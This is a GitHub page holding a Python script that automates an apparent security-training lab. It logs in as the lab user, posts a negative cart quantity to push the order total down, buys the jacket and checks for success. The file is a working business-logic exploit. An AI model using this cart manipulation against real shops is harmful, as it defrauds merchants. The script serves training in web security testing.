-
Notifications
You must be signed in to change notification settings - Fork 248
/
business-logic-flaw-lab-02.py
70 lines (54 loc) · 2.13 KB
/
business-logic-flaw-lab-02.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
def get_csrf_token(s, url):
r = s.get(url, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, 'html.parser')
csrf = soup.find("input", {'name': 'csrf'})['value']
return csrf
def buy_item(s, url):
# Retrieve the CSRF token
login_url = url + "/login"
csrf_token = get_csrf_token(s, login_url)
# Login as user
print("(+) Logging in as the wiener user...")
data_login = {"csrf": csrf_token, "username": "wiener", "password": "peter"}
r = s.post(login_url, data=data_login, verify=False, proxies=proxies)
res = r.text
if "Log out" in res:
print("(+) Successfully logged in as the wiener user...")
# Add negative items
cart_url = url + "/cart"
data_cart = {"productId": "20", "redir": "PRODUCT", "quantity": "-16"}
r = s.post(cart_url, data=data_cart, verify=False, proxies=proxies)
# Add Jacket to cart
cart_url = url + "/cart"
data_cart = {"productId": "1", "redir": "PRODUCT", "quantity": "1"}
r = s.post(cart_url, data=data_cart, verify=False, proxies=proxies)
# Checkout
checkout_url = url + "/cart/checkout"
csrf_token = get_csrf_token(s, cart_url)
data_checkout = {"csrf": csrf_token}
r = s.post(checkout_url, data=data_checkout, verify=False, proxies=proxies)
# Check if we solved the lab
if "Congratulations" in r.text:
print("(+) Successfully exploited the business logic vulnerability.")
else:
print("(-) Could not exploit the vulnerability.")
sys.exit(-1)
else:
print("(-) Could not login as the user.")
def main():
if len(sys.argv) !=2:
print("(+) Usage: %s <url>" % sys.argv[0])
print("(+) Example: %s www.example.com" % sys.argv[0])
sys.exit(-1)
s = requests.Session()
url =sys.argv[1]
buy_item(s, url)
if __name__ == "__main__":
main()